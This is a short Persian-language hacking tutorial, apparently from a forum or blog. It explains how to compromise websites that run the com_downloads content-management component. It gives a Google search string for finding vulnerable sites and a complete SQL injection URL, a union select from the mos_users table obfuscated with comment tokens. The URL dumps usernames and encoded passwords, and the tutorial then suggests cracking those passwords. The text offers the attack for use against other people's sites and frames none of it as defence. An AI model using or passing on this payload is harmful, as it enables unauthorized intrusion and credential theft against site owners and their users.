|
امروز براتون به آموزش جالب از سری آموزش های هک سایت به وسیله باگ های منتشر شده رو براتون گذاشتم! این آموزش از این قرار است که شما می توانید از طریق آسیپ پذیری موجو در سایت های که دارای مدیریت محتوای (com_downloads) هستند به هک یوزر و پسورد این قبیل سایت ها بپردازید! خوب شما برای هک این سایت ها ابتدا عبارت زیر را در گوگل جستجو کنید: "com_downloads"filecatid حال پس ار یافتن سایت های مورد نظر فقط کافی است که عبارت زیر را به ادامه نام سایت اضافه کنید: index.php?option=com_downloads&Itemid=S@BUN&func=selectfolder&filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/* حال مشاهده خواهید کرد که پسورد سایت را به صورت Encode شده در اختیار شما قرار داده می شود و شما می توانید به وسیله یک برنامه Encode پسورد اصلی را به دست آورید!
|
